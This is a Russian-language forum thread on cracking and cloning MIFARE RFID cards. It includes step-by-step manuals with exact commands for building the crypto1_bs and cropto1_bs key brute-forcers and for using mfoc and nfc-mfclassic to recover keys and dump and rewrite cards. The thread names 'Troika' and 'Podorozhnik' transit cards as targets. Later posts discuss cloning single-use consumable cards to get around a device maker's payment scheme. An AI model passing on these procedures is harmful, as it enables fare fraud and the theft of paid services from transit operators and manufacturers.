не обязательно ну Морковка с вас просто так.. Берёшь карту режешь на 2 части.. Берёшь поношенную и склеиваешь. У тебя теперь 2 карты С кодом также .. Если ты не тупой. ключик будет тебе не нужен дело всё в одном звуке VA......e
Где ты такой древний баян вычитал? Что и с чем ты будешь резать и склеивать если внутри метрошной карты крошечная NFC метка (чип)??? В лохматые годы резали карты с магнитной полосой. И то это из разряда баек.
а ты пробовал так делать ? в мохнатые то годы с кодом всё просто. нужно просто ответ получить и всё типа 2+2 =4
Дорого, и не интересно. Гораздо интереснее и познавательнее сдампать трафф между считывателем и картой народными средствами. Двумя ридерами, и желательно недорогими. В наличии имеются два универсальных UART RFC ридера\врайтера RC522, а вот информации как с помощью него прослушать траффик я так и не нашёл. Если у кого есть опыт работы в качестве сниффера таких модулей как RC522 или PN532, за инфу буду благодарен.
RFIDIOt v1.0i Couldn't initialise EMULATOR on reader 1 Использую PN532 Breakout Board UART Как побороть?
Вышел новый инструмент по бруту ключей к картам mifare Bitsliced Crypto-1 brute-forcer. Вот краткий мануал по установке "Bitsliced Crypto-1 brute-forcer" из исходников и пользованию его в Kali Linux amd64: Нам потребуется наличие доступа в интернет. 0. Качаем архив с исходниками тут: https://github.com/aczid/crypto1_bs и распаковываем в удобное для нас место. 1. Сперва ставим либу NFC, иначе будут ошибки c компиляцией, вбиваем в консоль под root: apt-get install libnfc-dev 2. Потом ставим crapto1 и captev1 по очереди вбив в консоль под root следующие команды: make get_crapto1 make get_craptev1 3. В той же консоле компилируем сам брутфорсер: make -f Makefile Для брута ключей используем libnfc_crypto1_crack Вбиваем в консоль под root: ./libnfc_crypto1_crack ffffffffffff 2 A 4 A где: ffffffffffff - известный нам ключ 2 - блок от которого этот ключ А - наименование ключа (можно и "В" указать если знаете) 4 - блок от которого нам нужно узнать ключ А - соответствует искомому ключу А, если нужен В , указываем соответственно В. Ключ подбирался довольно быстро, в зависимости от сложности конечно от 5 до 15 минут.
Мануал по снятию дампа и записи mifare карт 1к и 4к. Способ подходит для дампа всяких там "Троек" и "поДорожников". Инструменты: -Ридер ACR122U /либо любой совместимый с ПО -Kali Lunux x64 c набором программ Libnfc http://www.libnfc.org -Bitsliced Crypto-1 brute-forcer https://github.com/aczid/crypto1_bs 1. Брутим нужные для чтения блоков карты ключи с помощью libnfc_crypto1_crac из набора "Bitsliced Crypto-1 brute-forcer ". Вбиваем в консоль под root: ./libnfc_crypto1_crack ffffffffffff 2 A 4 A где: ffffffffffff - известный нам ключ 2 - блок от которого этот ключ А - наименование ключа (можно и "В" указать если знаете) 4 - блок от которого нам нужно узнать ключ А - соответствует искомому ключу А, если нужен В , указываем соответственно В. Если все нужные нам ключи уже известны можно, начинать с пункта 2. 2. Считываем ключи с карты в дамп с помощью MFOC: mfoc -f key.txt -O /root/Desktop/mycard_key.mfd где: -f key.txt - текстовой файл с ключами, в место нее можно использовать переменную "-k" и указать известный ключ -O /root/Desktop/mycard_key.mfd - путь для сохранения дампа с ключами 3. Для снятия полного дампа карты можно использовать утилиту nfc-mfclassic, указав ей в качестве файла с ключами дамп полученный mfoc: nfc-mfclassic r A /root/Desktop/mycard_dump.mfd /root/Desktop/mycard_key.mfd где: r -переменная для чтения дампа A -ключи А (Можно использовать и ключи B) /root/Desktop/mycard_dump.mfd - место сохранения дампа карты /root/Desktop/mycard_key.mfd - место куда мы сохранили ключи снятые с карты с помощью mfoc 4. Запись дампа карты обратно на ту же карту: nfc-mfclassic w A /root/Desktop/mycard_dump.mfd /root/Desktop/mycard_key.mfd где: w - опция для записи снятого ранее дампа на карту mifare. Остальные опции аналогичны п. 3
Сropto1_bs-master -ещё один новый инструмент по бруту ключей к картам mifare по типу Битслайтера. Тестировал на работоспособность в Кали линух 2017.3 х64 бит. I. Инструкция по установке cropto1_bs-master из репозитория: apt install zlib1g-dev apt-get install liblzma-dev sudo apt install libreadline6-dev sudo apt install libncurses5-dev git clone https://github.com/vk496/cropto1_bs cd cropto1_bs/ make II. Инструкция по установке из архива к сообщению: cd cropto1_bs-master dpkg -i zlib1g-dev_1.2.8.dfsg-5_amd64.deb dpkg -i libreadline-dev_7.0-3_amd64.deb dpkg -i libncurses5-dev_6.0+20170902-1_amd64.deb make Для брута ключей используем cropto1_bs: ./cropto1_bs 000000000000 47 a 47 b где: 000000000000 - известный нам ключ 47 - блок от которого этот ключ a - наименование ключа (можно и "В" указать если знаете) 47 - блок от которого нам нужно узнать ключ b - соответствует искомому ключу b, если нужен A , указываем соответственно A. Ключ подбирался довольно быстро, в зависимости от сложности конечно от 1 до 20 минут: Скачать архив: http://zalil.su/2018243
Подскажите, кто в теме Имеется устройство со встроенным RFID Reader RC522 В устройство засыпается специальный порошок. Производитель, кроме устройства, хочет зарабатывать на этом самом порошке, и цену на него ставит в 10 раз выше реальной Для защиты в устройство встроен , и в комплекте с каждым пакетиком порошка идет карта, которая при считывании добавляет устройству время работы. В теме только начинаю разбираться, поэтому все мои домыслы построены исключительно на минимальной логике. Пункт 1. Карта может быть использована только 1 раз. Раз устройства не имеют подключения к интернету - значит нет общей базы, какая карта была использована, а какая нет. Следовательно на карте имеется какой-то ключ, который после срабатывания карты обнуляется- затирается? Пункт 2. говорит ли это о том, что карту можно заранее клонировать и таким образом использовать сколько угодно раз? Пункт 3. Конечно, в этом случае карта может быть с шифрованием, честно говоря пока что понятия не имею, клонируются ли такие карты. Буду благодарен за любые ответы
Хоть бы модель и название устройства написали, может уже есть готовые решения. Возможно номер карты записывается на чип устройства Не факт, на карте может ничего не затираться, а сверяться uid карты с контрольной суммой на чипе устройства. Или устройство использует карты Mifare Ultralite - на которых выжигаются сектора и повторно их не использовать. Рекомендую так же покопать в сторону сброса данных на чипе самого устройства.
устройство - генератор искр Sparcular, модель гляну Номер карты записывается на чип устройства - было бы понятно, но на другом устройстве эту карту уже использовать не получается, при этом устройства никак не синхронизируются, поэтому и думал, про затирание, выжигание или перезапись (по идее это можно сделать и во время чтения,RFID Reader RC522 вроде это позволяет, так? ) "сверяться uid карты с контрольной суммой на чипе устройства." - исходя из отсутствия синхронизации вроде тоже отпадает.. я так понимаю мне как минимум нужен ACR122U, чтобы посмотреть, что с данными происходит. (опять же, я еще не понял, поможет ли он это сделать, если на карте какое-нибудь шифрование используется. но по идее да, ведь я как минимум увижу изменение данных)
Для начала подойдёт смартфон c NFC умеющий mifare, что бы считать метку с инфой о карте. Ибо надо хотя бы понимать , тип самой карты. Если это ультралайт - то решение одно, если Классик , другое. А может это и не mifare вовсе
смартфон с NFC подороже будет. подумал снять RFID Reader RC522 с самого устройства, и через ардуинку считать, что за карта опять же, по описанию https://habr.com/ru/company/flprog/blog/396501/ https://mysku.ru/blog/aliexpress/23114.html Поддержвиаемые типы карт: MIFARE S50, MIFARE S70, MIFARE UltraLight, MIFARE Pro, MIFARE DESfire